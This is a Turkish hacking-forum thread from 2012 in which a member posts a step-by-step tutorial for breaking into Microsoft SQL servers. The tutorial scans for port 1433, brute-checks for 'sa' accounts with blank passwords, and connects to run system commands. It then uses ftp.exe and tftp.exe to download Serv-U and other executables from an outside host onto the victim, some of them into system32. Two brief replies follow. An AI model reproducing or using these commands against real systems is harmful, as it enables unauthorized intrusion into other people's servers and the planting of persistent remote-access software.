Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.






SQL (Server) Hacking

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 06-07-2012 18:44   #1
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
07/2012
Nereden
Bruksel
Mesajlar
Konular

Teşekkür (Etti): 6
Teşekkür (Aldı): 70


SQL (Server) Hacking



S.A. Arkadaslar...

Ilk Önce Cay Demlemek Üzere Ocaga Su Koyuyoruz Ve Tekrar PC\'mizin Basina Geciyoruz ))) (Ilerleyen Bölümlerde Isimize Yarayacak)
Gerekli Materyaller:
SQL Scanner
SERV-U
SQLexec
TFTP
Eveet Bu Yukarda Yazdiklarim Nedir Ne Ise Yarar Birazdan Görecegiz.
a) Ilk Önce Serv-u Yu Ayarlayip Portunu 4 Rakamli Konuma Getirecegiz. Örnek: 3275
b) SQL Scan Result Örnegin Su Sekilde Görünür: 127.0.0.1 Found MsSQL account: sa/[Null]
Burdaki Gördügümüz "sa" Username "[Null]" ise Password\'dur. "[Null]" Bu Password Belirtilmemis Demektir.
c) SQLexec\'i Aynen Bu Sekilde Ayarliyoruz. Username: sa Password: [Null]
d) Serv-u Icin Bir Path Yani Dizin Buluyoruz.
e) TFTP\'yi Kendi Bilgisayarimizda Calistiriyoruz.
f) SQL\'de Normal DOS Komutlari Gecerlidir. Dolayisiyla DOS Komutlariyla Calisacagiz.
g) c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.ini c:Buraya Path serv-u.ini << Yazacagiz. Yani Serv-u.ini nin Yolunu Yazacagiz. Bu Komutla Serv-u.ini\'yi Aliyoruz.
h) c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.exe c:Buraya Path serv-u.exe << Yazacagiz. Yani Serv-u.exe nin Yolunu Yazacagiz.
i) Sonra DirServ-u.exe Yaziyoruz. Bu Komutla Serv-u.exe\'mizi Calistiririz.
1) Scan Ve RecHecken:
Ilk Önce SQL Server Bulabilmemiz Icin SQL Server Scanner Bulmamiz Gerek. Bunu "Sfind.exe" Adli Programla Yapabiliriz. SQL Server\'lerin Port\'u 1433\'dür. Bununla Beraber Scan Yapiyoruz.
Scan Olayi Bittikten Sonra Scanner\'imiz Bize Bir Yigin IP Adresi Verecektir. Sifre Bulabilmemiz Icin Bu IP Adreslerini RecHecken Yapmamiz Lazim. Su Sekilde:
"SQLLHF.exe" Adli Dosyayi HDD\'mizin C Sürücüsüne Kopyeliyoruz. Sonra "Check_1.bat" Isimli Dosyayi HDD\'mizin C Sürücüsüne Kopyeliyoruz. Ayni Sekilde "Sfind.exe" Adli Scanner\'imize Ait Olan "Sfind.txt" Dosyasida C Sürücüsünde Olmalidir.
Sonra DOS\'u Aciyoruz Ve "Check_1.bat Dosyasini Calistiriyoruz. O Otomatik Olarak Sfind.txt\'deki IP\'lere Ping Atacak. Bu Islem Yaklasik 5 Dakika Sürecektir.
Bu Arada Biz, Koydugumuz Cay Suyuna Bakiyoruz Ve Cayimizi Demliyoruz. Cayimizi Yudumlayarak Islemlerimize Devam Ediyoruz )))
PING Olayi Bitti. Simdi Sonuclara Bakiyoruz. Örnegin: "Checking 127.xxx.xx.xx ::: Password not guessed" Su Sekilde Bir Yazi Varsa Bu Serveri Hackleyemeyiz. Ama Su Sekilde Olursa: "Checking 127.xxx.xx.xx ::: Password is blank!! <---- WARNING!" Iste O Zaman Hackleyebiliriz Demektir
2) Connecting Yani Hacking
"SQLexec.exe" Adli Tool\'umuzu Calistiriyoruz. Buldugumuz IP Adresini Giriyoruz. Username\'yi Her Halukarda sa Olarak Ve Password\'u Blank Olarak Giriyoruz.
Simdi Asagiya "dir c:" Komutunu Veriyoruz. Veeee SQL Server\'in C Sürücüsüne Girmis Oluyoruz ))
Serv-u Dosyalarini TFTP\'ye Yüklemek Icin Su Komutlari Verebiliriz (IP Adresini Örnek Olarak Veriyorum):
tftp.exe -i 127.0.0.1 GET Servudaemon.exe c:server.exe
tftp.exe -i 127.0.0.1 GET TzoLibr.dll c: TzoLibr.dll
tftp.exe -i 127.0.0.1 GET winmgnt.exe c:winmgnt.exe
tftp.exe -i 127.0.0.1 GET httpodbc.dll c:httpodbc.dll
tftp.exe -i 127.0.0.1 GET ServUDaemon.ini c:ServUDaemon.ini
tftp.exe -i 127.0.0.1 GET speed.exe c:windowssystem32speed.exe ? ?
tftp.exe -i 127.0.0.1 GET 1.txt c:windowssystem321.txt )____ ????
tftp.exe -i 127.0.0.1 GET 2.txt c:windowssystem322.txt )
Yukarda Belirtmis Oldugum Tool Ve Programlari Google\'den Bulmaniz Gerekecek. Aradim Aradim Arsivlerimde Bulamadim. Eee 100 GB\'den Fazla Arsiv Bulundurursan Aradiklarini Kolay Kolay Bulamazsin )
Kolay Gelsin...
 Offline  
 
Alıntı ile Cevapla
Alt 06-07-2012 19:01   #2
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
07/2012
Nereden
Manisa
Mesajlar
Konular
5

Teşekkür (Etti): 10
Teşekkür (Aldı): 13




bilader çay molası verdirmedin
 Offline  
 
Alıntı ile Cevapla
Alt 06-07-2012 19:55   #3
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
07/2012
Nereden
Bruksel
Mesajlar
Konular

Teşekkür (Etti): 6
Teşekkür (Aldı): 70




idare ediceksin
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli
instagram takipci hilesi

wau